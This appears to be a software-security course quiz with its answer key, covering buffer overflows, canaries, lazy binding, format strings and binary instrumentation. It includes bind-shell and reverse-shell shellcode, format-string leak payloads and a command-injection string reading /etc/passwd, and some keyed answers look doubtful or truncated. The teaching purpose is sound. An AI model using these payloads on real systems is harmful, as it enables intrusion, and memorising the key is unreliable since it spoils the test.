COMP5700 Auburn
What defense mechanism randomize(s) memory layout?
Stack Canary Correct! ASLR DEP/NX CFI
In pwndbg environment for a 32-bit binary, the program counter is currently before the following instruction: call 8049050 which of the followings is/are True??
The return address is saved using another instruction other than call instruction The leave instruction will pop the return address on the stack Correct! This call instruction will jump to the callee function and save return address The return address is saved by call instruction in the registers
We can redirect the program to any address with 0x90 (NOP) instructions after our shellcode to execute our shellcode immediately. 0x90909090 0x90909090 paddings 0x895242d3 0x89524252 0x9958666a shellcode ... 0x90909090 nop; nop; nop; nop ... 0x90909090 nop sled (<-pc)
True Correct! False
ret2libc technique returns to kernel functions.
True Correct! False
Linux whatis command:
displays multiple lines full description of a man page, list only one man page displays one-line description of a man page, list only one man page displays multiple lines full descriptions of a man page, list all available man pages Correct! displays one-line description of a man page, list all available man pages
In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } In the program, ______ function allocates a new file descriptor that refers to the network socket. The standard output file descriptor number is ______. (Please fill in the first blank with a function name of four characters long and fill in the second blank with a one-digit decimal integer)
dup2 1
In ATT syntax of x86 instruction assembly, fill in the following with to move a constant 0x11 to eax register. mov _____, ______
$0x11 %eax
In pwntools command utilities, the command to generate assembly hexadecimal of nop instruction on arm architecture is: asm _____ arm nop
-c
In GCC, which compilation flag is for canary mechanism?
-fsanitize=cfi-icall -pie -pie -fPIE Correct! -fstack-protector
To set current current program execute with privilege of the root user. We need to call setuid system call with ________ (Please fill in one-digit decimal integer)
0
We can bypass canary via information leakage with a format string vulnerability. If the current canary value before our attack is 0x23098302, then in our exploit, the value we should put for canary is (Please fill in the blank with a hexadecimal number starting with 0x and then 8-hexadecimal-digit.)
0x23098302
The current esp register value is 0x7fffffffde20. After executing the following instruction: push %ebp The current esp register value is __________. (The content in the blank should starts with 0x, followed by 12 hexadecimal digits, for instance, 0x7fffffffde20). Next, the following instruction is executed: pop %eax The current esp register value is __________. (The content in the blank should starts with 0x, followed by 12 hexadecimal digits, for instance, 0x7fffffffde20).
0x7fffffffde1c 0x7fffffffde20
Which defense mechanism is particularly effective for code injection attacks?
ASLR Runtime ASLR Correct! DEP/NX CFI
In our lecture, we show an example of lazy binding and the code snippets are: 08049030 <.plt>: ... 8049050: f3 0f 1e fb endbr32 8049054: 68 08 00 00 00 push $0x8 8049059: e9 d2 ff ff ff jmp 8049030 <printf@plt-0x40> 804905e: 66 90 xchg %ax,%ax 8049060: f3 0f 1e fb endbr32 8049064: 68 10 00 00 00 push $0x10 8049069: e9 c2 ff ff ff jmp 8049030 <printf@plt-0x40> 804906e: 66 90 xchg %ax,%ax Disassembly of section .plt.sec: ... 08049080 <__libc_start_main@plt>: 8049080: f3 0f 1e fb endbr32 8049084: ff 25 10 c0 04 08 jmp *0x804c010 804908a: 66 0f 1f 44 00 00 nopw 0x0(%eax,%eax,1) 08049090 <foo@plt>: 8049090: f3 0f 1e fb endbr32 8049094: ff 25 14 c0 04 08 jmp *0x804c014 804909a: 66 0f 1f 44 00 00 nopw 0x0(%eax,%eax,1) Contents of section .got.plt: 804c000 0cbf0408 00000000 00000000 40900408 ............@... 804c010 50900408 60900408 P...`... For the first time the program calls foo function, which is in another object file, which two instructions are executed to solve this?
0x8049050 -> 0x8049080 0x8049094 -> 0x8049080 0x8049094 -> 0x8049050 Correct! 0x8049094 -> 0x8049060
In our lecture, we show an example of lazy binding and the code snippets are: 08049030 <.plt>: ... 8049050: f3 0f 1e fb endbr32 8049054: 68 08 00 00 00 push $0x8 8049059: e9 d2 ff ff ff jmp 8049030 <printf@plt-0x40> 804905e: 66 90 xchg %ax,%ax 8049060: f3 0f 1e fb endbr32 8049064: 68 10 00 00 00 push $0x10 8049069: e9 c2 ff ff ff jmp 8049030 <printf@plt-0x40> 804906e: 66 90 xchg %ax,%ax Disassembly of section .plt.sec: ... 08049080 <__libc_start_main@plt>: 8049080: f3 0f 1e fb endbr32 8049084: ff 25 10 c0 04 08 jmp *0x804c010 804908a: 66 0f 1f 44 00 00 nopw 0x0(%eax,%eax,1) 08049090 <foo@plt>: 8049090: f3 0f 1e fb endbr32 8049094: ff 25 14 c0 04 08 jmp *0x804c014 804909a: 66 0f 1f 44 00 00 nopw 0x0(%eax,%eax,1) Contents of section .got.plt: 804c000 0cbf0408 00000000 00000000 40900408 ............@... 804c010 50900408 60900408 P...`... For the first time the program calls foo function, what is actual target address the instruction jmp *0x804c014 jumps to is __________. (Address in hexadecimal, starts with 0x, and a total of 7 hexadecimal digits)
0x8049060
In our lecture, we have the following assembly code snippet for main function: 08049298 <main>: ... 8049448: 83 ec 0c sub $0xc,%esp 804944b: ff 75 ec push -0x14(%ebp) 804944e: e8 e3 fd ff ff call 8049236 <client_handle> 8049453: 83 c4 10 add $0x10,%esp 8049456: eb 98 jmp 80493f0 <main+0x158> After calling function client_handle, the fall-through address is _________. (Please fill in the blank with an address starting with 0x and then 7 digits)
0x8049453
What is the first byte of our shellcode on this x86 machine? 0x90909090 0x90909090 paddings 0x895242d3 0x89524252 0x9958666a shellcode ... 0x90909090 nop; nop; nop; nop ... 0x90909090 nop sled (<-pc)
0x99 Correct! 0x6a 0x58 0x66
In our lecture code, we use the following shellcode to reveal canary by exploiting a format string vulnearbility: shellcode = "AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x" Say, for a particular run, the output is: $ python3 reveal_canary.pyb'AAAA.400.f7fe67d3.0.804d5b0.1ab.41414141.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78
0x9b179100
A C program is compiled on 32 bit x86 machine. A variable is declared this way: unsigned v = 0xdeadbeef; This variable v is stored at 0x555555558010 in the runtime memory. Fill in each byte in hexadecimal for each address in the following. Starts with 0x and then two digits of hexadecimal for all the blanks below. Address 0x555555558010 0x555555558011 0x555555558012 0x555555558013 (Content in hex (e.g., 0x00))
0xef 0xbe 0xad 0xde
A C program is compiled on 64 bit x86 machine. A variable is declared this way: long unsigned v = 0xdeadbeef; This variable v is stored at 0x555555558010 in the runtime memory. Fill in each byte in hexadecimal for each address in the following. Starts with 0x and then two digits of hexadecimal for all the blanks below. Address 0x555555558010 0x555555558011 0x555555558012 0x555555558013 0x555555558014 0x555555558015 0x555555558016 0x555555558017 (Content in hex (e.g., 0x00))
0xef 0xbe 0xad 0xde 0x00 0x00 0x00 0x00
A C program is compiled on 64 bit x86 machine. A variable is declared this way: long unsigned v = 0xdeadbeefdeadbeef; This variable v is stored at 0x555555558010 in the runtime memory. Fill in each byte in hexadecimal for each address in the following. Starts with 0x and then two digits of hexadecimal for all the blanks below. Address 0x555555558010 0x555555558011 0x555555558012 0x555555558013 0x555555558014 0x555555558015 0x555555558016 0x555555558017 (Content in hex (e.g., 0x00))
0xef 0xbe 0xad 0xde 0xef 0xbe 0xad 0xde
Let's consider the following code: stack_overflow.c #include <stdio.h> #include <stdlib.h> #include <string.h> void check_secret(char *argv1){ int secret = 0xdeadcafe; char user_input[ 0x30]; strcpy(user_input, argv1); if (secret == 0xdeadbeef) { puts("Congratulations! You find the flag"); exit(0); } else {puts("Please try again!");} } int main(int argc, char **argv){ if (argc != 2) {printf("stack_overflow <secret>\n");return 1;} check_secret(argv[ 1]); return 0; } We first try AAAA as the input. By using pwndbg tool, we have the following memory layout: pwndbg> x/12xw &user_input 0xffffd17c: 0x41414141 0x00000000 0x00000000 0x01000000 0xffffd18c: 0x0000000b 0xf7fc4540 0x00000000 0xf7c184be 0xffffd19c: 0x0000000b 0xf7fc4540 0x00000000 0xf7c184be 0xffffd1ac: 0xdeadcafe 0xf7fbe4a0 0xf7fd6f80 0xffffd1c8 Suppose currently user_input have the value string of AAAA and secret has the value of 0xdeadcafe. Fill in the following blanks: The variable user_input stack address is ____________. (Please fill in an address starting with 0x and followed by 8 hexadecimal digits) The variable secret stack address is __________________. (Please fill in an address starting with 0x and followed by 8 hexadeci
0xffffd17c 0xffffd1ac 48
Suppose we have the current global variable layout for a binary: pwndbg> x/128x &buf_dta 0x804c040 <buf_dta>: 0x00000001 0x00000000 0x00000000 0x00000000 0x804c050 <buf_dta+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c060 <buf_dta+32>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c070 <buf_dta+48>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c080 <buf_dta+64>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c090 <buf_dta+80>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0a0 <buf_dta+96>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0b0 <buf_dta+112>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0c0 <secret>: 0xdeadcafe 0x00000000 0x00000000 0x00000000 0x804c0d0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0e0 <compltd.0>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c0f0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c100 <buf_bss>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c110 <buf_bss+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c120 <buf_bss+32>: 0x00000000 0x00000000 0x00000000 0x00000000 0x804c130 <buf_bss+48>: 0x00000000 0x00000000 0x00000000 0x00000000 W
128
In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } The script listens to the port _______ on the local machine. (Please fill in with a 5-digit decimal integer)
33333
In our lecture, we have the following code: fmt_vuln.c #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { char text[ 1024]; static int targeted_val = 0x5a5a5a5a; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[ 0]); exit(0);} strcpy(text, argv[ 1]); printf(text); printf("\n"); printf("[ *] targeted_val @ 0x%08x = %d 0x%08x\n", \&targeted_val, targeted_val, targeted_val); exit(0);} Suppose we have the following output for a command: $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08xAAAAff99d2b5.f7c05634.ff99b94c.ff99d2b5.41414141.f7c05634.ff99b94c[ *] targeted_val @ 0x0804c028 = 1515870810 0x5a5a5a5a Fill in the following blank with one digit of decimal integer number: $ ./fmt_vuln AAAA%________ \$xAAAA41414141[ *] targeted_val @ 0x0804c028 = 1515870810 0x5a5a5a5a
5
On 32-bit x86 machines, the following assembly code snippet makes a write system call. # write(1, message, 14) mov $4, %eax # system call 4 is write mov $1, %ebx # file handle 1 is stdout mov $message, %ecx # address of string to output mov $14, %edx # number of bytes int $0x______ # invoke operating system to do the write On 64-bit x86 machines, the following assembly code snippet makes a write system call. # write(1, message, 14) mov $1, %rax # system call 1 is write mov $1, %rdi # file handle 1 is stdout mov $message, %rsi # address of string to output mov $14, %rdx # number of bytes ______________ # invoke operating system to do the write
80 syscall
In our lecture, we have the following code: #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv){ char command[100]; sprintf(command, "cat grades/%s", argv[1]); system(command); return 0; } Suppose there are only two files in subfolder grades named alice and bob, and their contents are A and B, respectively.
Correct! Command $ ./cat_grade "alice;/bin/cat /etc/passwd" will output both contents of files grades/alice and /etc/passwd Command $ ./cat_grade "alice;/bin/cat /etc/passwd" will output an error message Command $ ./cat_grade "alice;/bin/cat /etc/passwd" will output the following: B Command $ ./cat_grade "alice;/bin/cat /etc/passwd" will output only content of file grades/alice
As for format string attacks, which of the followings is/are True?
Correct! %s looks at the parameter memory content and prints out the content pointed by that memory content %s looks at the parameter memory content and prints out the content in that memory For 32-bit binary, printf("X is %d, Y is 0x%08x\n", X, Y); before calling this function, the format string is pushed onto the stack first, X afterwards, and then Y. %n writes the number of words read so far to the parameter on the stack
Fuzzing can be categorized into the following classes:
Correct! Black-box fuzzing Correct! White-box fuzzing Correct! Grey-box fuzzing Red-box fuzzing
The right order of attacks in history:
Correct! Code injection attacks, then code reuse attacks Code reuse attacks, then code reuse attacks Code reuse attacks, then code injection attacks Code injection attacks, then code injection attacks
Why C programming language is believed to weak in security features?
Correct! No overflow checks Correct! No boundary checks Correct! No automatic memory management Correct! Static typing but with loopholes
In our lecture, we show an example of Pin tool: #include <stdio.h> #include "pin.h" FILE * trace; void printip(void *ip) { fprintf(trace, "%p\n", ip); } void Instruction(INS ins, void *v) { INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)printip, IARG_INST_PTR, IARG_END);} void Fini(INT32 code, void *v) { fclose(trace); } int main(int argc, char * argv[]) { trace = fopen("itrace.out", "w"); PIN_Init(argc, argv); INS_AddInstrumentFunction(Instruction, 0); PIN_AddFiniFunction(Fini, 0); PIN_StartProgram(); return 0; } .... While of the followings is/are true?
Correct! PIN_Init initializes the Pin framework PIN_Init initializes the user program execution The Pin tool prints out each instruction address to terminal output Correct! The Pin tool prints out each instruction address to a file
Select the file types that are of ELF file format:
Correct! Relocatable object files (.o) Correct! Shared object files (.so) Correct! Executable object files Assembly files (.s)
In our lecture, we have the following code: #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv){ char command[100]; sprintf(command, "cat grades/%s", argv[1]); system(command); return 0; } Suppose there are only two files in subfolder grades named alice and bob, and their contents are A and B, respectively. Which of followings is/are correct?
Correct! The program has no input validation. The program has input validation. The following command: $ ./cat_grade alice Output will be:B Correct! By crafting a malicious input string, cat_grade program can execute other commands such as ls
In our lecture, we show an example of lazy binding and the code snippets are: 08049030 <.plt>: ... 8049050: f3 0f 1e fb endbr32 8049054: 68 08 00 00 00 push $0x8 8049059: e9 d2 ff ff ff jmp 8049030 <printf@plt-0x40> 804905e: 66 90 xchg %ax,%ax 8049060: f3 0f 1e fb endbr32 8049064: 68 10 00 00 00 push $0x10 8049069: e9 c2 ff ff ff jmp 8049030 <printf@plt-0x40> 804906e: 66 90 xchg %ax,%ax Disassembly of section .plt.sec: ... 08049080 <__libc_start_main@plt>: 8049080: f3 0f 1e fb endbr32 8049084: ff 25 10 c0 04 08 jmp *0x804c010 804908a: 66 0f 1f 44 00 00 nopw 0x0(%eax,%eax,1) 08049090 <foo@plt>: 8049090: f3 0f 1e fb endbr32 8049094: ff 25 14 c0 04 08 jmp *0x804c014 804909a: 66 0f 1f 44 00 00 nopw 0x0(%eax,%eax,1) Contents of section .got.plt: 804c000 0cbf0408 00000000 00000000 40900408 ............@... 804c010 50900408 60900408 P...`... For the second time the program calls foo function, which is in another object file, which of the following(s) is/are true?
Correct! The second time will not jump into the .plt address in the first time. The second time foo function resolution is the same as first time. The second time will jump into another .plt address different from the first time. Correct! The second time foo function resolution is different from first time
In our lecture, we have the following code: /* Reverse TCP shell (72 bytes) Connects to 192.168.1.133:33333 by default. */ #include <stdio.h> #include <string.h> int main(void) { unsigned char code[] = \ "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" //"\xc0\xa8\x01\x85" // <-- ip address "\x7f\x00\x00\x01" // <-- ip address "\x66\x68" "\x82\x35" // <--- tcp port "\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; int (*ret)() = (int(*)())code;ret(); } Which of the followings is/are correct?
Correct! The shellcode is on the stack Correct! The port is represented in this shellcode as bytes "\x82\x35" and it is 33333 Correct! The remote ip address in this shellcode is represented as bytes "\x7f\x00\x00\x01" Correct! The remote ip address is 127.0.0.1
In our lecture, we have the following code: #include <stdio.h> #include <strings.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd, connfd; struct sockaddr_in serv_addr, cli_addr; socklen_t sin_size; sockfd = socket(AF_INET, SOCK_STREAM, 0); bzero(&serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(33333); bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); listen(sockfd, 1); sin_size = sizeof(cli_addr); connfd = accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size); dup2(connfd, 0); dup2(connfd, 1); dup2(connfd, 2); char *argv[] = {"/bin/sh", NULL}; execve(argv[0], argv, NULL); } Which of the followings is/are correct?
Correct! The shellcode starts a /bin/sh shell Correct! It is permitted to set the third parameter of execve to be NULL Correct! The shellcode listens to some port on the machine The shellcode starts a connection with a known server ip
Besides Linux OSs, UNIX OSs also use Executable and Linkable Format (ELF) for binary code.
Correct! True False
ELF header points to the program header table and section header table, while recording the size of each of them. Correct! True
Correct! True False
In order to connect to the reverse shell, the attacker server should listen to port 8080 beforehand.
Correct! True False
In our lecture, as shown in the figure, the return address is overwritten with the start address of the buffer. address 0xffffd0ec 0xffffcedc return address (512+12+4) ___ 0xffffd148 saved ebp | | frame of client | handle 0xffffcedc 0x6a 0x66 0x58 0x99 buffer ___|
Correct! True False
In our lecture, we have the following code: #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv){ char command[100]; sprintf(command, "cat grades/%s", argv[1]); system(command); return 0; } Suppose there are only two files in subfolder grades named alice and bob, and their contents are A and B, respectively. Select if the following is True or False: Command $ ./cat_grade `python3 -c 'print("A"*100)'` will output a message containing "No such file or directory"
Correct! True False
In our lecture, we have the following code: #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv){ char command[100]; sprintf(command, "cat grades/%s", argv[1]); system(command); return 0; } Suppose there are only two files in subfolder grades named alice and bob, and their contents are A and B, respectively. Select if the following is True or False: Command $ ./cat_grade `python3 -c 'print("A"*4)'` is equivalent to
Correct! True False
In our lecture, we have the following code: #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv){ char command[100]; sprintf(command, "cat grades/%s", argv[1]); system(command); return 0; } Suppose there are only two files in subfolder grades named alice and bob, and their contents are A and B, respectively. Select if the following is True or False: Command $ ./cat_grade `python3 -c 'print("A"*4)'` is equivalent to $ ./cat_grade AAAA
Correct! True False
Intel Pin tools can not only launch and instrument an application but also can attach to a running process and instrument that application.
Correct! True False
Linux systems have a system call named setuid.
Correct! True False
Morris Worms exploits stack overflow as early as in 1980s.
Correct! True False
On 32-bit x86 machines and 64-bit x86 machines, the registers used to pass parameters for system calls are different.
Correct! True False
One segment in a binary code file can contain multiple sections.
Correct! True False
StackShield protection creates a separate stack to store a copy of the function's return address.
Correct! True False
To analyze binary code, extra code can be instrumented either statically or dynamically.
Correct! True False
Today's canary is stored in gs segment.
Correct! True False
We can bypass canary protection via __stack_chk_fail hijacking. Specifically, for instance, we can overwrite the GOT entry for __stack_chk_fail.
Correct! True False
We can redirect the program to any address with 0x90 (NOP) instructions before our shellcode to execute our shellcode immediately. 0x90909090 0x90909090 paddings 0x895242d3 0x89524252 0x9958666a shellcode ... 0x90909090 nop; nop; nop; nop ... 0x90909090 nop sled (<-pc)
Correct! True False
if you print python A*100 && perl Ax100 are they the same?
Correct! True False
By dynamic binary analysis, the ``dynamic'' here means:
Correct! analyzing by running the program analyzing by not running the program analyzing by compiling the program analyzing by not compiling the program
We have two binaries compiled using different GCC compiler optimization flags. The source code: #include <stdio.h> void f (){ char a[30]; int b; double c; char d[20]; char *p; char e[10]; char *q; printf ("%p=a\n%p=b\n%p=c\n%p=d\n%p=e\n%p=p\n%p=q\n\n",&a, &b, &c, &d, &e, &p, &q); } void main () {f();} The result of running two binaries: binary_1 and binary_2: $ ./binary_1 | sort 0xffffd118=q 0xffffd11e=e 0xffffd128=p 0xffffd12c=d 0xffffd140=c 0xffffd14c=b 0xffffd152=a $ ./binary_2 | sort 0xffffd13c=b 0xffffd140=p 0xffffd144=q 0xffffd148=c 0xffffd150=e 0xffffd15a=d 0xffffd16e=a Which of the followings is/are true?
Correct! binary_2 has canary protection binary_1 has canary protection Neither binaries have canary protection Both binaries have canary protection
In our lecture, we use the following python code to symbolic execute and explore the states of programs to guess the password. 1 import angr 2 import claripy 3 4 password= claripy.BVS("password",8*8) 5 proj = angr.Project('./pwdre0') 6 init_state = proj.factory.entry_state(args=['./pwdre0',password]) 7 8 def is_good(state): 9 return b'Congratulations! You win' in state.posix.dumps(1) 10 11 def is_bad(state): 12 return b'You loose. Please try again' in state.posix.dumps(1) 13 14 sm=proj.factory.simgr(init_state) 15 sm.explore(find=is_good, avoid=is_bad) 16 if sm.found: 17 found_state=sm.found[0] 18 passwd=found_state.solver.eval(password,cast_to=bytes) 19 print("Solution {}".format(passwd.decode("utf-8"))) Particularly, for line 4, password= claripy.BVS("password",8*8),
Correct! creates a bit vector named "password" creates a bit vector of 4 bytes creates a bit vector containing "password" Correct! creates a bit vector of 8 bytes
global _start section .text _start: jmp short call_shellcode shellcode: pop ebx mov ecx,0 mov edx,0 mov al, 11 int 0x80 call_shellcode: call shellcode message db "/bin/sh" Which of the following is/are correct?
Correct! pop ebx instruction will pop the address of string "/bin/sh" Correct! call shellcode instruction will push the address of the string "/bin/sh" on the stack The shellcode will not contain NULL bytes call shellcode instruction will not push any bytes on the stack
In our lecture, we show an example of Pin tool: #include <stdio.h> #include "pin.h" FILE * trace; void printip(void *ip) { fprintf(trace, "%p\n", ip); } void Instruction(INS ins, void *v) { INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)printip, IARG_INST_PTR, IARG_END);} void Fini(INT32 code, void *v) { fclose(trace); } int main(int argc, char * argv[]) { trace = fopen("itrace.out", "w"); PIN_Init(argc, argv); INS_AddInstrumentFunction(Instruction, 0); PIN_AddFiniFunction(Fini, 0); PIN_StartProgram(); return 0; } While function is the instrumentation routine and which is the analysis routine?
Correct! printip function is the analysis routine Correct! Instruction function is the instrumentation routine Instruction function is the analysis routine main function is the analysis routine
Linking can happen during:
Correct! run time Correct! compile time preprocessing time Correct! load time
Linux Man Page Sections contain information about:
Correct! system calls Correct! file formats Correct! user commands Correct! library functions
In our lecture, we use the following python code to symbolic execute and explore the states of programs to guess the password. 1 import angr 2 import claripy 3 4 password= claripy.BVS("password",8*8) 5 proj = angr.Project('./pwdre0') 6 init_state = proj.factory.entry_state(args=['./pwdre0',password]) 7 8 def is_good(state): 9 return b'Congratulations! You win' in state.posix.dumps(1) 10 11 def is_bad(state): 12 return b'You loose. Please try again' in state.posix.dumps(1) 13 14 sm=proj.factory.simgr(init_state) 15 sm.explore(find=is_good, avoid=is_bad) 16 if sm.found: 17 found_state=sm.found[0] 18 passwd=found_state.solver.eval(password,cast_to=bytes) 19 print("Solution {}".format(passwd.decode("utf-8"))) What is the path criterion used in this symbolic execution that is considered to find the correct input?
Correct! when a string "Congratulations! You win" is found in system output when a variable containing string "password" is found when a variable named "password" is found when a string "Congratulations! You win" is found in the binary code
In pwndbg environment for a 32-bit binary, which of the followings is/are True?
Correct! x/100xb 0x80804840 will output 100 bytes of memory starting from 0x80804840 Correct! x/100x 0x80804840 will output 100 words of memory starting from 0x80804840 if previous command is x/100xw 0x80804840 x/100x 0x80804840 will output 100 bytes of memory starting from 0x80804840 if previous command is x/100xw 0x80804840 Correct! x/100xw 0x80804840 will output 100 words of memory starting from 0x80804840
What defense mechanism mainly target(s) at code injection attacks?
Fuzzing CFI Correct! DEP/NX ASLR
Software tool examples of dynamic binary instrumentation are:
GCC Correct! QEMU Correct! Pin Correct! Valgrind
Which of the following about stack canary defense is correct?
In function epilogue, canary will be loaded and in function prologue, canary will be checked Correct! In function prologue, canary will be loaded and in function epilogue, canary will be checked Canary will be checked in function prologue only In function prologue, canary will be loaded and will never be checked afterwards
Why C programming language is still widely used today?
No automatic memory management Correct! Backwards-compatibility for legacy systems Correct! Performance reasons No boundary checks
Consider the following simple program: #include <string.h> void main(int argc, char **argv) { har buf[16]; strcpy(buf, argv[1]); return; } Is it possible to overflow? Where?
No. Correct! Yes. On the stack Yes. On the heap Yes. On both heap and stack.
We have the following two running processes virtual memory maps: Process 101201: $ cat /proc/101201/maps 08048000-08049000 r--p 00000000 08:02 2241047 /home/schen/comp6700/lec10/srv_1 08049000-0804a000 r-xp 00001000 08:02 2241047 /home/schen/comp6700/lec10/srv_1 0804a000-0804b000 r--p 00002000 08:02 2241047 /home/schen/comp6700/lec10/srv_1 0804b000-0804c000 r--p 00002000 08:02 2241047 /home/schen/comp6700/lec10/srv_1 0804c000-0804d000 rw-p 00003000 08:02 2241047 /home/schen/comp6700/lec10/srv_1 0804d000-0806f000 rw-p 00000000 00:00 0 [heap] f7c00000-f7c20000 r--p 00000000 08:02 1977041 /usr/lib/i386-linux-gnu/libc.so.6 f7c20000-f7da2000 r-xp 00020000 08:02 1977041 /usr/lib/i386-linux-gnu/libc.so.6 f7da2000-f7e27000 r--p 001a2000 08:02 1977041 /usr/lib/i386-linux-gnu/libc.so.6 f7e27000-f7e28000 ---p 00227000 08:02 1977041 /usr/lib/i386-linux-gnu/libc.so.6 f7e28000-f7e2a000 r--p 00227000 08:02 1977041 /usr/lib/i386-linux-gnu/libc.so.6 f7e2a000-f7e2b000 rw-p 00229000 08:02 1977041 /usr/lib/i386-linux-gnu/libc.so.6 f7e2b000-f7e35000 rw-p 00000000 00:00 0 f7fbe000-f7fc0000 rw-p 00000000 00:00 0 f7fc0000-f7fc4000 r--p 00000000 00:00 0 [vvar] f7fc4000-f7fc6000 r-xp 00000000 00:00 0 [vdso] f7f
Process 101201 has NX/DEP protection Correct! Process 122321 has NX/DEP protection Both processes have NX/DEP protection Neither processes have NX/DEP protection
Select all is/are correct:
Reverse shell initiates the connection from attacker machine using connect function Correct! Remote shellcode can remotely access a machine through internet connections Correct! Some shellcode can download and execute another shellcode Correct! Bind shell binds to a particular port
In our lecture, we also have another example of Pin tool: #include <stdio.h> #include "pin.H" UINT64 icount = 0; void docount(INT32 c) { icount += c; } void Trace(TRACE trace, void *v) { for (BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl)) { BBL_InsertCall(bbl, IPOINT_BEFORE, (AFUNPTR)docount, IARG_UINT32, BBL_NumIns(bbl), IARG_END); } } void Fini(INT32 code, void *v) { fprintf(stderr, "Count %lld\n", icount); } int main(int argc, char * argv[]) { PIN_Init(argc, argv); TRACE_AddInstrumentFunction(Trace, 0); PIN_AddFiniFunction(Fini, 0); PIN_StartProgram();return 0; } Which of the followings is/are correct about this example Pin tool?
This Pin tool instruments at the program point after each instruction This Pin tool prints out each instruction runtime address This Pin tool instruments at the program point before each instruction Correct! This Pin tool prints out total instruction count executed
.bss section contains initialized data.
True Correct! False
As for canary protection: The control data on the stack is between the buffer and the canary.
True Correct! False
Binaries compiled with "-z execstack" will have none-executable stacks.
True Correct! False
If an object file needs further linking with other object files, it contains no relocation information.
True Correct! False
If we overwrite the return address with an address of a JMP ESP instruction, that is, we perform a JMP ESP based stack smashing, the shellcode should have a lower address than the address storing return address.
True Correct! False
